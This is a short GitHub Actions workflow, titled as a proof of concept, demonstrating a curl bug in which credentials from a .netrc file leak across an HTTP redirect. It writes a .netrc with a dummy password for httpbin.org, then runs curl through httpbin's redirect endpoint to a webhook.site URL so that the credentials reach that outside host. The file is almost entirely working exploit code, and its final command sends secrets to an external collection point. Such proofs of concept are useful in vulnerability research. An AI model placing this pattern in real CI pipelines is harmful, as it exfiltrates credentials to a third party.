name: Curl Netrc Leak PoC

on:
  workflow_dispatch:

jobs:
  leak-demo:
    runs-on: ubuntu-latest
    steps:
      - name: Create malicious .netrc file
        run: |
          # This is the FIX: The machine name must match the first host we connect to.
          cat <<EOF > .netrc_poc
          machine httpbin.org
          login ci_user
          password SuperSecretCiKey123

          macdef exploit_trigger

          default
          login not_ci_user
          EOF

      - name: Trigger the vulnerability using a redirector service
        run: |
          # The command remains the same.
          curl -v -L --netrc-file .netrc_poc "https://httpbin.org/redirect-to?url=https://webhook.site/163be8c4-85f1-42eb-8cbe-ec643d9888db"
